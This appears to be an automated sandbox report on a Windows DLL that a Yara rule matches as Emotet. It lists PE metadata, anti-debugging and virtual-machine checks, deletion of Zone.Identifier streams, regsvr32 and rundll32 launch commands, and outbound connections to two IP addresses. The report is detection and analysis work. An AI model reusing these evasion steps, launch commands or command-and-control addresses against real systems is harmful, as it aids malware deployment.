Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000009.00000003.390522998.0000000001122000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.386458009.00000000008F7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386707582.00000000008F7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386650391.00000000008F7000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386804457.00000000008F7000.00000004.00000001.sdmp
Source:	Binary string: winspool.pdb9kpz source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.390627336.0000000001120000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.390627336.0000000001120000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdb]k source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.386451052.00000000008F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386643870.00000000008F1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.390510495.0000000004871000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdbuk4zl source: WerFault.exe, 00000009.00000003.390648764.0000000001128000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.390538795.0000000001128000.00000004.00000040.sdmp
Source:	Binary string: a/pjr2pCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000009.00000002.401712125.0000000000672000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.387043294.00000000008EB000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.386443931.00000000008EB000.00000004.00000001.sdmp

Source: ALNgwfVtrB.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ALNgwfVtrB.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ALNgwfVtrB.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ALNgwfVtrB.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ALNgwfVtrB.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D31195 push cs; iretd	0_2_00D31197
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1003060D push ecx; ret	3_2_10030620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1003060D push ecx; ret	4_2_10030620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10030E7D push ecx; ret	4_2_10030E90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03661195 push cs; iretd	5_2_03661197

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1003E278 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

3_2_1003E278

Source: ALNgwfVtrB.dll

Static PE information: real checksum: 0x970bf should be: 0x9d4b2

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\ALNgwfVtrB.dll

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Mhgwckn\ikgetkts.aey

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Sqvvzhazj\lzmoqnoyzvyzrne.eqq:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Mhgwckn\ikgetkts.aey:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100250A3 IsIconic,GetWindowPlacement,GetWindowRect,	3_2_100250A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100250A3 IsIconic,GetWindowPlacement,GetWindowRect,	4_2_100250A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001DFC0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	4_2_1001DFC0

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 1692	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 340	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5688	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_3-10574
Source: C:\Windows\SysWOW64\regsvr32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_3-10597
Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\rundll32.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 5.9 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 4.7 %

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node			graph_3-10599
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
Source: Amcache.hve.9.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: svchost.exe, 00000018.00000002.863748399.000002E116062000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: svchost.exe, 00000015.00000002.527636071.000001E0BCC7F000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.527944145.000001E0BCCEE000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.526784558.000001E0BCC7F000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.863698910.000002E11604C000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1x
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: svchost.exe, 00000018.00000002.863117295.000002E110A29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`c
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_1002DB0D

Source: C:\Windows\SysWOW64\regsvr32.exe

3_2_1003E278

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_10002D40 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

3_2_10002D40

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D3F7F7 mov eax, dword ptr fs:[00000030h]		0_2_00D3F7F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0366F7F7 mov eax, dword ptr fs:[00000030h]		5_2_0366F7F7

Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00D3C6B8 LdrInitializeThunk,

0_2_00D3C6B8

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1003A8D4 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_1003A8D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002DB0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_1002DB0D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10032CB9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_10032CB9

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 69.16.218.101 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.138.98.34 80			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6764 -ip 6764	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 528	Jump to behavior

Source: loaddll32.exe, 00000000.00000000.380455229.00000000011F0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.379465543.00000000011F0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000000.380455229.00000000011F0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.379465543.00000000011F0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000000.380455229.00000000011F0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.379465543.00000000011F0000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: loaddll32.exe, 00000000.00000000.380455229.00000000011F0000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.379465543.00000000011F0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	3_2_1003E000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	3_2_1003D098
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,	3_2_1002129B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	3_2_1003D35E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	3_2_1003850E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	3_2_1003D7AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	4_2_1003E000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	4_2_1003D098
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	4_2_1003D8C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	4_2_1003D95D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	4_2_1003D9D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	4_2_1003F9F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	4_2_1003EA86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,	4_2_1002129B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,	4_2_1003EABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	4_2_1003D35E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	4_2_1003DBA3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_1003EBF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_1003DC64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	4_2_1003DCCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	4_2_1003DD07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	4_2_1003850E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,	4_2_1003CE40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	4_2_1003D7AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	4_2_1003C7D2

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1003732F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_1003732F

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_10024F01 _memset,GetVersionExA,

4_2_10024F01

Source: Amcache.hve.9.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 5.2.rundll32.exe.5200000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5a90000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.54c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.46a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.53b0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5490000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b50000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.56a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5640000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.46a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b50000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.d30000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.56d0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.55d0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5460000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5600000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.53c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5200000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.b50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.46d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.3080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5930000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5640000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.5630000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.4020000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5900000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.55a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.55a0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.5380000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.d30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.33d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.56a0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.4e60000.1.unpack, type: UNPACKEDPE
